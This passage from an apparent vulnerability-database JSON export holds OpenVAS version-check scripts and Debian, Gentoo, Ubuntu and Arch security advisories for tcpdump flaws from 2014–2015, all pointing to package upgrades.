\"CVE-2014-8768\", \"CVE-2014-8769\");\n script_tag(name:\"cvss_base\", value:\"6.4\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:N/C:P/I:N/A:P\");\n script_name(\"Fedora Update for tcpdump FEDORA-2014-15609\");\n script_tag(name: \"summary\", value: \"Check the version of tcpdump\");\n script_tag(name: \"vuldetect\", value: \"Get the installed version with the help of detect NVT and check if the version is vulnerable or not.\");\n script_tag(name: \"insight\", value: \"Tcpdump is a command-line tool for monitoring network traffic.\nTcpdump can capture and display the packet headers on a particular\nnetwork interface or on all interfaces. Tcpdump can display all of\nthe packet headers, or just the ones that match particular criteria.\n\nInstall tcpdump if you need a program to monitor network traffic.\n\");\n script_tag(name: \"affected\", value: \"tcpdump on Fedora 21\");\n script_tag(name: \"solution\", value: \"Please Install the Updated Packages.\");\n script_xref(name: \"FEDORA\", value: \"2014-15609\");\n script_xref(name: \"URL\" , value: \"https://lists.fedoraproject.org/pipermail/package-announce/2014-December/145449.html\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n script_tag(name:\"qod_type\", value:\"package\");\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (C) 2015 Greenbone Networks GmbH\");\n script_family(\"Fedora Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/fedora\", \"ssh/login/rpms\");\n exit(0);\n}\n\ninclude(\"revisions-lib.inc\");\ninclude(\"pkg-lib-rpm.inc\");\n\nrelease = get_kb_item(\"ssh/login/release\");\n\nres = \"\";\nif(release == NULL){\n exit(0);\n}\n\nif(release == \"FC21\")\n{\n\n if ((res = isrpmvuln(pkg:\"tcpdump\", rpm:\"tcpdump~4.6.2~2.fc21\", rls:\"FC21\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if (__pkg_match) exit(99); # Not vulnerable.\n exit(0);\n}", "cvss": {"score": 6.4, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:NONE/A:PARTIAL/"}}, {"lastseen": "2018-09-01T23:53:53", "bulletinFamily": "scanner", "description": "Check the version of tcpdump", "modified": "2017-07-19T00:00:00", "published": "2014-11-28T00:00:00", "id": "OPENVAS:1361412562310868523", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310868523", "title": "Fedora Update for tcpdump FEDORA-2014-15541", "type": "openvas", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n#\n# Fedora Update for tcpdump FEDORA-2014-15541\n#\n# Authors:\n# System Generated Check\n#\n# Copyright:\n# Copyright (C) 2014 Greenbone Networks GmbH, http://www.greenbone.net\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.868523\");\n script_version(\"$Revision: 6759 $\");\n script_tag(name:\"last_modification\", value:\"$Date: 2017-07-19 11:56:33 +0200 (Wed, 19 Jul 2017) $\");\n script_tag(name:\"creation_date\", value:\"2014-11-28 06:27:47 +0100 (Fri, 28 Nov 2014)\");\n script_cve_id(\"CVE-2014-8767\", \"CVE-2014-8768\", \"CVE-2014-8769\");\n script_tag(name:\"cvss_base\", value:\"6.4\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:N/C:P/I:N/A:P\");\n script_name(\"Fedora Update for tcpdump FEDORA-2014-15541\");\n script_tag(name: \"summary\", value: \"Check the version of tcpdump\");\n script_tag(name: \"vuldetect\", value: \"Get the installed version with the help of detect NVT and check if the version is vulnerable or not.\");\n script_tag(name: \"insight\", value: \"Tcpdump is a command-line tool for monitoring network traffic.\nTcpdump can capture and display the packet headers on a particular\nnetwork interface or on all interfaces. Tcpdump can display all of\nthe packet headers, or just the ones that match particular criteria.\n\nInstall tcpdump if you need a program to monitor network traffic.\n\");\n script_tag(name: \"affected\", value: \"tcpdump on Fedora 20\");\n script_tag(name: \"solution\", value: \"Please Install the Updated Packages.\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n script_tag(name:\"qod_type\", value:\"package\");\n script_xref(name: \"FEDORA\", value: \"2014-15541\");\n script_xref(name: \"URL\" , value: \"https://lists.fedoraproject.org/pipermail/package-announce/2014-November/144951.html\");\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (C) 2014 Greenbone Networks GmbH\");\n script_family(\"Fedora Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/fedora\", \"ssh/login/rpms\");\n exit(0);\n}\n\ninclude(\"revisions-lib.inc\");\ninclude(\"pkg-lib-rpm.inc\");\n\nrelease = get_kb_item(\"ssh/login/release\");\n\nres = \"\";\nif(release == NULL){\n exit(0);\n}\n\nif(release == \"FC20\")\n{\n\n if ((res = isrpmvuln(pkg:\"tcpdump\", rpm:\"tcpdump~4.5.1~2.fc20\", rls:\"FC20\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if (__pkg_match) exit(99); # Not vulnerable.\n exit(0);\n}\n", "cvss": {"score": 6.4, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:NONE/A:PARTIAL/"}}, {"lastseen": "2017-07-26T08:48:36", "bulletinFamily": "scanner", "description": "Several vulnerabilities have been\ndiscovered in tcpdump, a command-line network traffic analyzer. These\nvulnerabilities might result in denial of service, leaking sensitive information\nfrom memory or, potentially, execution of arbitrary code.", "modified": "2017-07-11T00:00:00", "published": "2014-12-03T00:00:00", "href": "http://plugins.openvas.org/nasl.php?oid=703086", "id": "OPENVAS:703086", "title": "Debian Security Advisory DSA 3086-1 (tcpdump - security update)", "type": "openvas", "sourceData": "######################################################################\n# OpenVAS Vulnerability Test\n# $Id: deb_3086.nasl 6663 2017-07-11 09:58:05Z teissa $\n# Auto-generated from advisory DSA 3086-1 using nvtgen 1.0\n# Script version: 1.0\n#\n# Author:\n# Greenbone Networks\n#\n# Copyright:\n# Copyright (c) 2014 Greenbone Networks GmbH http://greenbone.net\n# Text descriptions are largely excerpted from the referenced\n# advisory, and are Copyright (c) the respective author(s)\n#\n# This program is free software; you can redistribute it and/or\n# modify it under the terms of the GNU General Public License\n# as published by the Free Software Foundation; either version 2\n# of the License, or (at your option) any later version.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n#\n###########################################################################\n\nif(description)\n{\n script_id(703086);\n script_version(\"$Revision: 6663 $\");\n script_cve_id(\"CVE-2014-8767\", \"CVE-2014-8769\", \"CVE-2014-9140\");\n script_name(\"Debian Security Advisory DSA 3086-1 (tcpdump - security update)\");\n script_tag(name: \"last_modification\", value: \"$Date: 2017-07-11 11:58:05 +0200 (Tue, 11 Jul 2017) $\");\n script_tag(name: \"creation_date\", value: \"2014-12-03 00:00:00 +0100 (Wed, 03 Dec 2014)\");\n script_tag(name:\"cvss_base\", value:\"6.4\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:N/C:P/I:N/A:P\");\n script_tag(name: \"solution_type\", value: \"VendorFix\");\n\n script_xref(name: \"URL\", value: \"http://www.debian.org/security/2014/dsa-3086.html\");\n\n\n script_category(ACT_GATHER_INFO);\n\n script_copyright(\"Copyright (c) 2014 Greenbone Networks GmbH http://greenbone.net\");\n script_family(\"Debian Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/debian_linux\", \"ssh/login/packages\");\n script_tag(name: \"affected\", value: \"tcpdump on Debian Linux\");\n script_tag(name: \"insight\", value: \"This program allows you to dump\nthe traffic on a network. tcpdump is able to examine IPv4, ICMPv4, IPv6, ICMPv6,\nUDP, TCP, SNMP, AFS BGP, RIP, PIM, DVMRP, IGMP, SMB, OSPF, NFS and many other\npacket types.\");\n script_tag(name: \"solution\", value: \"For the stable distribution (wheezy),\nthese problems have been fixed in version 4.3.0-1+deb7u1.\n\nFor the upcoming stable distribution (jessie), these problems have been\nfixed in version 4.6.2-3.\n\nFor the unstable distribution (sid), these problems have been fixed in\nversion 4.6.2-3.\n\nWe recommend that you upgrade your tcpdump packages.\");\n script_tag(name: \"summary\", value: \"Several vulnerabilities have been\ndiscovered in tcpdump, a command-line network traffic analyzer. These\nvulnerabilities might result in denial of service, leaking sensitive information\nfrom memory or, potentially, execution of arbitrary code.\");\n script_tag(name: \"vuldetect\", value: \"This check tests the installed software\nversion using the apt package manager.\");\n script_tag(name:\"qod_type\", value:\"package\");\n exit(0);\n}\n\ninclude(\"revisions-lib.inc\");\ninclude(\"pkg-lib-deb.inc\");\n\nres = \"\";\nreport = \"\";\nif ((res = isdpkgvuln(pkg:\"tcpdump\", ver:\"4.3.0-1+deb7u1\", rls_regex:\"DEB7.[0-9]\")) != NULL) {\n report += res;\n}\n\nif (report != \"\") {\n security_message(data:report);\n} else if (__pkg_match) {\n exit(99); # Not vulnerable.\n}\n", "cvss": {"score": 6.4, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:NONE/A:PARTIAL/"}}, {"lastseen": "2018-09-01T23:55:15", "bulletinFamily": "scanner", "description": "Several vulnerabilities have been\ndiscovered in tcpdump, a command-line network traffic analyzer. These\nvulnerabilities might result in denial of service, leaking sensitive information\nfrom memory or, potentially, execution of arbitrary code.", "modified": "2018-04-06T00:00:00", "published": "2014-12-03T00:00:00", "id": "OPENVAS:1361412562310703086", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310703086", "title": "Debian Security Advisory DSA 3086-1 (tcpdump - security update)", "type": "openvas", "sourceData": "######################################################################\n# OpenVAS Vulnerability Test\n# $Id: deb_3086.nasl 9354 2018-04-06 07:15:32Z cfischer $\n# Auto-generated from advisory DSA 3086-1 using nvtgen 1.0\n# Script version: 1.0\n#\n# Author:\n# Greenbone Networks\n#\n# Copyright:\n# Copyright (c) 2014 Greenbone Networks GmbH http://greenbone.net\n# Text descriptions are largely excerpted from the referenced\n# advisory, and are Copyright (c) the respective author(s)\n#\n# This program is free software; you can redistribute it and/or\n# modify it under the terms of the GNU General Public License\n# as published by the Free Software Foundation; either version 2\n# of the License, or (at your option) any later version.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n#\n###########################################################################\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.703086\");\n script_version(\"$Revision: 9354 $\");\n script_cve_id(\"CVE-2014-8767\", \"CVE-2014-8769\", \"CVE-2014-9140\");\n script_name(\"Debian Security Advisory DSA 3086-1 (tcpdump - security update)\");\n script_tag(name: \"last_modification\", value: \"$Date: 2018-04-06 09:15:32 +0200 (Fri, 06 Apr 2018) $\");\n script_tag(name: \"creation_date\", value: \"2014-12-03 00:00:00 +0100 (Wed, 03 Dec 2014)\");\n script_tag(name:\"cvss_base\", value:\"6.4\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:N/C:P/I:N/A:P\");\n script_tag(name: \"solution_type\", value: \"VendorFix\");\n\n script_xref(name: \"URL\", value: \"http://www.debian.org/security/2014/dsa-3086.html\");\n\n\n script_category(ACT_GATHER_INFO);\n\n script_copyright(\"Copyright (c) 2014 Greenbone Networks GmbH http://greenbone.net\");\n script_family(\"Debian Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/debian_linux\", \"ssh/login/packages\");\n script_tag(name: \"affected\", value: \"tcpdump on Debian Linux\");\n script_tag(name: \"insight\", value: \"This program allows you to dump\nthe traffic on a network. tcpdump is able to examine IPv4, ICMPv4, IPv6, ICMPv6,\nUDP, TCP, SNMP, AFS BGP, RIP, PIM, DVMRP, IGMP, SMB, OSPF, NFS and many other\npacket types.\");\n script_tag(name: \"solution\", value: \"For the stable distribution (wheezy),\nthese problems have been fixed in version 4.3.0-1+deb7u1.\n\nFor the upcoming stable distribution (jessie), these problems have been\nfixed in version 4.6.2-3.\n\nFor the unstable distribution (sid), these problems have been fixed in\nversion 4.6.2-3.\n\nWe recommend that you upgrade your tcpdump packages.\");\n script_tag(name: \"summary\", value: \"Several vulnerabilities have been\ndiscovered in tcpdump, a command-line network traffic analyzer. These\nvulnerabilities might result in denial of service, leaking sensitive information\nfrom memory or, potentially, execution of arbitrary code.\");\n script_tag(name: \"vuldetect\", value: \"This check tests the installed software\nversion using the apt package manager.\");\n script_tag(name:\"qod_type\", value:\"package\");\n exit(0);\n}\n\ninclude(\"revisions-lib.inc\");\ninclude(\"pkg-lib-deb.inc\");\n\nres = \"\";\nreport = \"\";\nif ((res = isdpkgvuln(pkg:\"tcpdump\", ver:\"4.3.0-1+deb7u1\", rls_regex:\"DEB7.[0-9]\")) != NULL) {\n report += res;\n}\n\nif (report != \"\") {\n security_message(data:report);\n} else if (__pkg_match) {\n exit(99); # Not vulnerable.\n}\n", "cvss": {"score": 6.4, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:NONE/A:PARTIAL/"}}, {"lastseen": "2018-09-01T23:49:18", "bulletinFamily": "scanner", "description": "Check the version of tcpdump", "modified": "2017-07-10T00:00:00", "published": "2015-01-08T00:00:00", "id": "OPENVAS:1361412562310868908", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310868908", "title": "Fedora Update for tcpdump FEDORA-2014-16823", "type": "openvas", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n#\n# Fedora Update for tcpdump FEDORA-2014-16823\n#\n# Authors:\n# System Generated Check\n#\n# Copyright:\n# Copyright (C) 2015 Greenbone Networks GmbH, http://www.greenbone.net\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.868908\");\n script_version(\"$Revision: 6630 $\");\n script_tag(name:\"last_modification\", value:\"$Date: 2017-07-10 08:34:32 +0200 (Mon, 10 Jul 2017) $\");\n script_tag(name:\"creation_date\", value:\"2015-01-08 05:56:04 +0100 (Thu, 08 Jan 2015)\");\n script_cve_id(\"CVE-2014-9140\", \"CVE-2014-8767\", \"CVE-2014-8768\", \"CVE-2014-8769\");\n script_tag(name:\"cvss_base\", value:\"6.4\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:N/C:P/I:N/A:P\");\n script_name(\"Fedora Update for tcpdump FEDORA-2014-16823\");\n script_tag(name: \"summary\", value: \"Check the version of tcpdump\");\n script_tag(name: \"vuldetect\", value: \"Get the installed version with the help of detect NVT and check if the version is vulnerable or not.\");\n script_tag(name: \"insight\", value: \"Tcpdump is a command-line tool for monitoring network traffic.\nTcpdump can capture and display the packet headers on a particular\nnetwork interface or on all interfaces. Tcpdump can display all of\nthe packet headers, or just the ones that match particular criteria.\n\nInstall tcpdump if you need a program to monitor network traffic.\n\");\n script_tag(name: \"affected\", value: \"tcpdump on Fedora 21\");\n script_tag(name: \"solution\", value: \"Please Install the Updated Packages.\");\n script_xref(name: \"FEDORA\", value: \"2014-16823\");\n script_xref(name: \"URL\" , value: \"https://lists.fedoraproject.org/pipermail/package-announce/2015-January/147734.html\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n script_tag(name:\"qod_type\", value:\"package\");\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (C) 2015 Greenbone Networks GmbH\");\n script_family(\"Fedora Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/fedora\", \"ssh/login/rpms\");\n exit(0);\n}\n\ninclude(\"revisions-lib.inc\");\ninclude(\"pkg-lib-rpm.inc\");\n\nrelease = get_kb_item(\"ssh/login/release\");\n\nres = \"\";\nif(release == NULL){\n exit(0);\n}\n\nif(release == \"FC21\")\n{\n\n if ((res = isrpmvuln(pkg:\"tcpdump\", rpm:\"tcpdump~4.6.2~3.fc21\", rls:\"FC21\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if (__pkg_match) exit(99); # Not vulnerable.\n exit(0);\n}", "cvss": {"score": 6.4, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:NONE/A:PARTIAL/"}}, {"lastseen": "2018-10-29T12:40:06", "bulletinFamily": "scanner", "description": "Gentoo Linux Local Security Checks GLSA 201502-05", "modified": "2018-10-26T00:00:00", "published": "2015-09-29T00:00:00", "id": "OPENVAS:1361412562310121344", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310121344", "title": "Gentoo Security Advisory GLSA 201502-05", "type": "openvas", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n# $Id: glsa-201502-05.nasl 12128 2018-10-26 13:35:25Z cfischer $\n#\n# Gentoo Linux security check\n#\n# Authors:\n# Eero Volotinen <eero.volotinen@solinor.com>\n#\n# Copyright:\n# Copyright (c) 2015 Eero Volotinen, http://solinor.com\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.121344\");\n script_version(\"$Revision: 12128 $\");\n script_tag(name:\"creation_date\", value:\"2015-09-29 11:28:29 +0300 (Tue, 29 Sep 2015)\");\n script_tag(name:\"last_modification\", value:\"$Date: 2018-10-26 15:35:25 +0200 (Fri, 26 Oct 2018) $\");\n script_name(\"Gentoo Security Advisory GLSA 201502-05\");\n script_tag(name:\"insight\", value:\"Multiple vulnerabilities have been discovered in tcpdump:\");\n script_tag(name:\"solution\", value:\"Update the affected packages to the latest available version.\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n script_xref(name:\"URL\", value:\"https://security.gentoo.org/glsa/201502-05\");\n script_cve_id(\"CVE-2014-8767\", \"CVE-2014-8768\", \"CVE-2014-8769\", \"CVE-2014-9140\");\n script_tag(name:\"cvss_base\", value:\"6.4\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:N/C:P/I:N/A:P\");\n script_tag(name:\"qod_type\", value:\"package\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/gentoo\", \"ssh/login/pkg\");\n script_category(ACT_GATHER_INFO);\n script_tag(name:\"summary\", value:\"Gentoo Linux Local Security Checks GLSA 201502-05\");\n script_copyright(\"Eero Volotinen\");\n script_family(\"Gentoo Local Security Checks\");\n\n exit(0);\n}\n\ninclude(\"revisions-lib.inc\");\ninclude(\"pkg-lib-gentoo.inc\");\n\nres = \"\";\nreport = \"\";\n\nif((res=ispkgvuln(pkg:\"net-analyzer/tcpdump\", unaffected: make_list(\"ge 4.6.2-r1\"), vulnerable: make_list(\"lt 4.6.2-r1\"))) != NULL) {\n report += res;\n}\n\nif(report != \"\") {\n security_message(data:report);\n} else if (__pkg_match) {\n exit(99);\n}\n", "cvss": {"score": 6.4, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:NONE/A:PARTIAL/"}}, {"lastseen": "2018-09-01T23:49:29", "bulletinFamily": "scanner", "description": "Check the version of tcpdump", "modified": "2017-07-10T00:00:00", "published": "2015-03-31T00:00:00", "id": "OPENVAS:1361412562310869148", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310869148", "title": "Fedora Update for tcpdump FEDORA-2015-4939", "type": "openvas", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n#\n# Fedora Update for tcpdump FEDORA-2015-4939\n#\n# Authors:\n# System Generated Check\n#\n# Copyright:\n# Copyright (C) 2015 Greenbone Networks GmbH, http://www.greenbone.net\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.869148\");\n script_version(\"$Revision: 6630 $\");\n script_tag(name:\"last_modification\", value:\"$Date: 2017-07-10 08:34:32 +0200 (Mon, 10 Jul 2017) $\");\n script_tag(name:\"creation_date\", value:\"2015-03-31 07:08:30 +0200 (Tue, 31 Mar 2015)\");\n script_cve_id(\"CVE-2015-0261\", \"CVE-2015-2154\", \"CVE-2015-2153\", \"CVE-2015-2155\",\n \"CVE-2014-9140\", \"CVE-2014-8767\", \"CVE-2014-8768\", \"CVE-2014-8769\");\n script_tag(name:\"cvss_base\", value:\"7.5\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:N/C:P/I:P/A:P\");\n script_tag(name:\"qod_type\", value:\"package\");\n script_name(\"Fedora Update for tcpdump FEDORA-2015-4939\");\n script_tag(name: \"summary\", value: \"Check the version of tcpdump\");\n script_tag(name: \"vuldetect\", value: \"Get the installed version with the help\nof detect NVT and check if the version is vulnerable or not.\");\n script_tag(name: \"insight\", value: \"Tcpdump is a command-line tool for\nmonitoring network traffic. Tcpdump can capture and display the packet headers\non a particular network interface or on all interfaces. Tcpdump can display all\nof the packet headers, or just the ones that match particular criteria.\n\nInstall tcpdump if you need a program to monitor network traffic.\n\");\n script_tag(name: \"affected\", value: \"tcpdump on Fedora 21\");\n script_tag(name: \"solution\", value: \"Please Install the Updated Packages.\");\n script_xref(name: \"FEDORA\", value: \"2015-4939\");\n script_xref(name: \"URL\" , value: \"https://lists.fedoraproject.org/pipermail/package-announce/2015-March/153834.html\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (C) 2015 Greenbone Networks GmbH\");\n script_family(\"Fedora Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/fedora\", \"ssh/login/rpms\");\n exit(0);\n}\n\ninclude(\"revisions-lib.inc\");\ninclude(\"pkg-lib-rpm.inc\");\n\nrelease = get_kb_item(\"ssh/login/release\");\n\nres = \"\";\nif(release == NULL){\n exit(0);\n}\n\nif(release == \"FC21\")\n{\n\n if ((res = isrpmvuln(pkg:\"tcpdump\", rpm:\"tcpdump~4.7.3~1.fc21\", rls:\"FC21\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if (__pkg_match) exit(99); # Not vulnerable.\n exit(0);\n}\n", "cvss": {"score": 7.5, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}}], "debian": [{"lastseen": "2018-10-16T22:13:15", "bulletinFamily": "unix", "description": "Package : tcpdump\nVersion : 4.1.1-1+deb6u1\nCVE ID : CVE-2014-8767 CVE-2014-8769 CVE-2014-9140\nDebian Bug : 770424 770434\n\nSeveral vulnerabilities have been discovered in tcpdump, a command-line\nnetwork traffic analyzer. These vulnerabilities might result in denial\nof service, leaking sensitive information from memory or, potentially,\nexecution of arbitrary code.\n\n", "modified": "2014-12-08T19:00:24", "published": "2014-12-08T19:00:24", "id": "DEBIAN:DLA-102-1:4756A", "href": "https://lists.debian.org/debian-lts-announce/2014/debian-lts-announce-201412/msg00005.html", "title": "[SECURITY] [DLA 102-1] tcpdump security update", "type": "debian", "cvss": {"score": 6.4, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:NONE/A:PARTIAL/"}}, {"lastseen": "2018-10-16T22:14:42", "bulletinFamily": "unix", "description": "- -------------------------------------------------------------------------\nDebian Security Advisory DSA-3086-1 security@debian.org\nhttp://www.debian.org/security/ Salvatore Bonaccorso\nDecember 03, 2014 http://www.debian.org/security/faq\n- -------------------------------------------------------------------------\n\nPackage : tcpdump\nCVE ID : CVE-2014-8767 CVE-2014-8769 CVE-2014-9140\nDebian Bug : 770424 770434\n\nSeveral vulnerabilities have been discovered in tcpdump, a command-line\nnetwork traffic analyzer. These vulnerabilities might result in denial\nof service, leaking sensitive information from memory or, potentially,\nexecution of arbitrary code.\n\nFor the stable distribution (wheezy), these problems have been fixed in\nversion 4.3.0-1+deb7u1.\n\nFor the upcoming stable distribution (jessie), these problems have been\nfixed in version 4.6.2-3.\n\nFor the unstable distribution (sid), these problems have been fixed in\nversion 4.6.2-3.\n\nWe recommend that you upgrade your tcpdump packages.\n\nFurther information about Debian Security Advisories, how to apply\nthese updates to your system and frequently asked questions can be\nfound at: https://www.debian.org/security/\n\nMailing list: debian-security-announce@lists.debian.org\n", "modified": "2014-12-03T19:16:46", "published": "2014-12-03T19:16:46", "id": "DEBIAN:DSA-3086-1:0C00E", "href": "https://lists.debian.org/debian-security-announce/debian-security-announce-2014/msg00276.html", "title": "[SECURITY] [DSA 3086-1] tcpdump security update", "type": "debian", "cvss": {"score": 6.4, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:NONE/A:PARTIAL/"}}], "gentoo": [{"lastseen": "2016-09-06T19:46:19", "bulletinFamily": "unix", "description": "### Background\n\ntcpdump is a tool for capturing and inspecting network traffic.\n\n### Description\n\nMultiple vulnerabilities have been discovered in tcpdump:\n\n * The olsr_print function function contains an integer underflow error (CVE-2014-8767) \n * The geonet_print function function contains multiple integer underflow errors (CVE-2014-8768) \n * The decoder for the Ad hoc On-Demand Distance Vector protocol contains an out-of-bounds memory access error (CVE-2014-8769) \n * The ppp_hdlc function contains a buffer overflow error (CVE-2014-9140) \n\n### Impact\n\nA remote attacker may be able to send a specially crafted packet, possibly resulting in execution of arbitrary code or a Denial of Service condition. \n\n### Workaround\n\nThere is no known workaround at this time.\n\n### Resolution\n\nAll tcpdump users should upgrade to the latest version:\n \n \n # emerge --sync\n # emerge --ask --oneshot --verbose \">=net-analyzer/tcpdump-4.6.2-r1\"", "modified": "2015-02-07T00:00:00", "published": "2015-02-07T00:00:00", "id": "GLSA-201502-05", "href": "https://security.gentoo.org/glsa/201502-05", "type": "gentoo", "title": "tcpdump: Multiple vulnerabilities", "cvss": {"score": 6.4, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:NONE/A:PARTIAL/"}}], "ubuntu": [{"lastseen": "2018-08-31T00:10:26", "bulletinFamily": "unix", "description": "Steffen Bauch discovered that tcpdump incorrectly handled printing OSLR packets. A remote attacker could use this issue to cause tcpdump to crash, resulting in a denial of service, or possibly execute arbitrary code. (CVE-2014-8767)\n\nSteffen Bauch discovered that tcpdump incorrectly handled printing GeoNet packets. A remote attacker could use this issue to cause tcpdump to crash, resulting in a denial of service, or possibly execute arbitrary code. This issue only applied to Ubuntu 14.04 LTS and Ubuntu 14.10. (CVE-2014-8768)\n\nSteffen Bauch discovered that tcpdump incorrectly handled printing AODV packets. A remote attacker could use this issue to cause tcpdump to crash, resulting in a denial of service, reveal sensitive information, or possibly execute arbitrary code. (CVE-2014-8769)\n\nIt was discovered that tcpdump incorrectly handled printing PPP packets. A remote attacker could use this issue to cause tcpdump to crash, resulting in a denial of service, or possibly execute arbitrary code. (CVE-2014-9140)\n\nIn the default installation, attackers would be isolated by the tcpdump AppArmor profile.", "modified": "2014-12-04T00:00:00", "published": "2014-12-04T00:00:00", "id": "USN-2433-1", "href": "https://usn.ubuntu.com/2433-1/", "title": "tcpdump vulnerabilities", "type": "ubuntu", "cvss": {"score": 6.4, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:NONE/A:PARTIAL/"}}], "archlinux": [{"lastseen": "2016-09-02T18:44:38", "bulletinFamily": "unix", "description": "- CVE-2014-8767 (denial of service)\n\nInteger underflow in the olsr_print function when in verbose mode,\nallows remote attackers to cause a denial of service (crash) via a\ncrafted length value in an OLSR frame.\n\n- CVE-2014-8768 (denial of service)\n\nMultiple Integer underflows in the geonet_print function, when in\nverbose mode, allow remote attackers to cause a denial of service\n(segmentation fault and crash) via a crafted length value in a Geonet frame.\n\n- CVE-2014-8769 